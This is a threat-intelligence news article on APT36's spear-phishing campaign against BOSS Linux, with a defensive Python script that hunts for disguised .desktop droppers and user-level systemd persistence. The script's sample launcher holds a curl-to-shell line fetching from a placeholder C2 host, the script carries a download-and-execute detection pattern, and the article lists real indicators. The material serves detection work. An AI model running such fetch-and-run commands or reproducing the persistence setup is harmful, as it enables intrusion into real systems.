A prominent state-aligned threat actor has significantly evolved its arsenal, launching a sophisticated campaign targeting the Linux-based operating systems used by Indian government sectors. A new report from CYFIRMA reveals that APT36, also known as Transparent Tribe, is now deploying tailored malware specifically crafted to compromise BOSS (Bharat Operating System Solutions) Linux environments.
Historically known for targeting Windows systems, APT36 has demonstrated a “growing technical maturity” by pivoting to Linux ecosystems essential to India’s strategic sectors. The threat actor has adopted a “dual-platform delivery” strategy, ensuring their tools can compromise both Windows and Linux environments to maintain long-term, covert access.
This shift allows the group to “expand its operational reach, enhance success rates across diverse environments, and maintain covert, long-term access to critical government infrastructure.”
The intrusion begins with a spear-phishing email containing a malicious archive named Analysis_Proc_Report_Gem_2025.zip. Inside, victims find a file that appears to be a document but is actually a weaponized Linux shortcut file (.desktop).
This shortcut, titled Analysis_Proc_Report_Gem.desktop, is engineered to deceive. It uses the Icon=x-office-document metadata to mimic a legitimate office document. However, once clicked, it “silently download[s] and run[s] malicious components in the background while presenting benign content to the user.”
The execution flow is a multi-stage process designed for stealth:
- The Decoy: The script retrieves a decoy PDF (Analysis_Proc_Report_Gem.pdf) and opens it with LibreOffice. The PDF is password-protected to stall the user and draw their attention while the malware installs.
- The Payload: Simultaneously, the script downloads two files from an attacker-controlled server: an ELF binary named swcbc and a shell script swcbc.sh.
- Persistence: The malware establishes persistence using systemd. It creates a user-level service file that ensures the malware “runs immediately and persists across user sessions” without requiring root privileges.
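The two host artifacts this chain leaves behind, a document-looking `.desktop` launcher whose `Exec=` line fetches and runs remote content and a user-level systemd unit running a binary from a hidden home directory, can be triaged with a small script. The following is an added example written for this article, not tooling from CYFIRMA or the report; the sample files are constructed here (only the file names and the `Icon=x-office-document` value come from the report, and the C2 host is a placeholder).

```python
# Added hunting helper (not CYFIRMA's tooling) for the two TTPs above:
# a .desktop launcher that wears an office-document icon while its Exec=
# line fetches and runs remote content, and a user-level systemd unit
# (no root needed) that keeps a binary alive from a hidden $HOME directory.
import configparser
import re

# Download-then-execute fragments a document launcher has no business running.
FETCH_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b|chmod\s+\+x", re.I)
# A path like ~/.swcbc, $HOME/.swcbc or /home/<user>/.swcbc.
HIDDEN_HOME_RE = re.compile(r"(?:~|\$HOME|/home/[^/]+)/\.[\w-]+")

def _parse(text):
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case: Exec, Icon, ExecStart
    cp.read_string(text)
    return cp

def desktop_findings(text):
    """Reasons a .desktop launcher looks like a disguised dropper."""
    sec = _parse(text)["Desktop Entry"]
    exec_line = sec.get("Exec", "")
    reasons = []
    if sec.get("Icon", "").startswith("x-office-document"):
        reasons.append("office-document icon on an executable launcher")
    if FETCH_RE.search(exec_line):
        reasons.append("Exec= fetches and runs remote content")
    if HIDDEN_HOME_RE.search(exec_line):
        reasons.append("Exec= touches a hidden directory in $HOME")
    return reasons

def service_findings(text):
    """Reasons a user-level systemd unit looks like RAT persistence."""
    svc = _parse(text)["Service"]
    reasons = []
    if HIDDEN_HOME_RE.search(svc.get("ExecStart", "")):
        reasons.append("ExecStart= runs a binary from a hidden $HOME directory")
    if svc.get("Restart", "no").lower() == "always":
        reasons.append("Restart=always keeps the implant alive across sessions")
    return reasons

# Constructed samples: file names come from the report, the C2 host is a placeholder.
DROPPER = ('[Desktop Entry]\nType=Application\nName=Analysis_Proc_Report_Gem\n'
           'Icon=x-office-document\nExec=sh -c "curl -s http://C2-PLACEHOLDER/swcbc.sh'
           ' | sh; libreoffice ~/Analysis_Proc_Report_Gem.pdf"\n')
WRITER = '[Desktop Entry]\nType=Application\nName=Writer\nIcon=libreoffice-writer\nExec=libreoffice --writer %U\n'
UNIT = ('[Unit]\nDescription=swcbc\n[Service]\nExecStart=/home/user/.swcbc/swcbc\n'
        'Restart=always\n[Install]\nWantedBy=default.target\n')

if __name__ == "__main__":
    print(desktop_findings(DROPPER), desktop_findings(WRITER), service_findings(UNIT))
```

Point `desktop_findings` at files under `~/Desktop`, `~/Downloads` and `~/.config/autostart`, and `service_findings` at `~/.config/systemd/user/*.service`, to sweep a BOSS or other Linux desktop for this pattern.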
The core payload, swcbc, is a 64-bit ELF binary. Analysis reveals it is a “Python-based Remote Administration Tool (RAT) compiled using PyInstaller.”
Crucially, the recovered source code shows that the malware is designed to be cross-platform. It contains logic to identify the operating system and adapt its behavior accordingly:
- On Linux: It hides in the ~/.swcbc directory.
- On Windows: It installs itself in the %USERPROFILE%\swcbc folder and modifies the Registry for persistence.
The RAT provides a full suite of espionage capabilities, including:
- Arbitrary Command Execution: Running shell commands with system-level access.
- File Exfiltration: Uploading and downloading files to/from the C2 server.
- Screen Capture: Taking screenshots to provide “real-time visual monitoring” of the victim’s desktop.
The campaign relies on specific infrastructure for command and control. The primary domain identified is lionsdenim[.]xyz, a recently registered domain resolving to an IP address in Los Angeles. Payload delivery was traced to the IP address 185.235.137.90 located in Germany.
APT36’s move to target BOSS Linux represents a critical escalation in regional cyber-espionage. By tailoring their toolset to the specific “indigenous platforms” used by Indian government agencies, the group aims to bypass traditional security controls.
“The campaign underscores APT36’s increasing technical sophistication, rapid deployment of tailored payloads, and strategic focus on multi-platform exploitation,” the report concludes.